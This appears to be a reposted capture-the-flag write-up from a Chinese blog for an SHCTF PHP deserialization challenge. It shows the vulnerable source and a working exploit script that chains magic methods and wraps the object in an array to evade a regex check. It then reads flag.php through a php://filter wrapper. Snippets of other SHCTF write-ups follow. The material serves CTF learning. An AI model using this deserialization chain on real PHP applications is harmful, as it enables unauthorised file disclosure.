SHCTF

SHCTF

时间：2023-11-14 19:45:47浏览次数：18

标签：ding function milaoshu fei SHCTF data public

 <?php
highlight_file(__FILE__);
class misca{
    public $gao;
    public $fei;
    public $a;
    public function __get($key){
        $this->miaomiao();
        $this->gao=$this->fei;
        die($this->a);
    }
    public function miaomiao(){
        $this->a='Mikey Mouse~';
    }
}
class musca{
    public $ding;
    public $dong;
    public function __wakeup(){
        return $this->ding->dong;
    }
}
class milaoshu{
    public $v;
    public function __tostring(){
        echo"misca~musca~milaoshu~~~";
        include($this->v);
    }
}
function check($data){
    if(preg_match('/^O:\d+/',$data)){
        die("you should think harder!");
    }
    else return $data;
}
unserialize(check($_GET["wanna_fl.ag"]));

exp:

 <?php
class misca{
    public $gao;
    public $fei;
    public $a;
 
}
class musca{
    public $ding;
    public $dong;

}
class milaoshu{
    public $v;

}

$c=new musca();
$c->ding=new misca();
$c->ding->fei=new milaoshu();
$c->ding->gao = &($c->ding)-> a;
$c->ding->fei->v="php://filter/convert.base64-encode/resource=flag.php";
echo serialize(array($c));
?>

标签：ding,function,milaoshu,fei,SHCTF,data,public
From： https://www.cnblogs.com/kode00/p/17780458.html

2023 SHCTF-校外赛道 PWN WP
WEEK1nc连接靶机直接梭hardnc同样是nc直接连，但是出题人利用linux命令的特性，将部分flag放在了特殊文件中利用ls-a查看所有文件，查看.gift，可以得到前半段然后再lsgift2以及cat相关的内容得不到任何数据。。。因此考虑到会不会是进入目录下找，再更换到gift2目录中，查看flag2，......
SHCTF(山河）赛事部分Write up-白猫
SHCTF(山河）赛事部分Writeup-白猫MISC[WEEK1]签到题下载题目并打开：base128编码：Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5因为是base128编码，所以通过两次base64解码，即可得出flag爆出flag：flag{this_is_flag}**总结： **这道签到题主要考察了对base64编码的基础了解[WEEK1]Steganography下载题......
shctf week1 wp
REez_asm程序的逻辑大概是把输入的数据flag按字节^0x1E-0x0A一遍，然后输出，所以只需要置反一下先+0x0A然后再^0x1e就能求出flag.text:0000000000401566loc_401566:;CODEXREF:main+65↓j.text:0000000......

相关文章

赞助商

阅读排行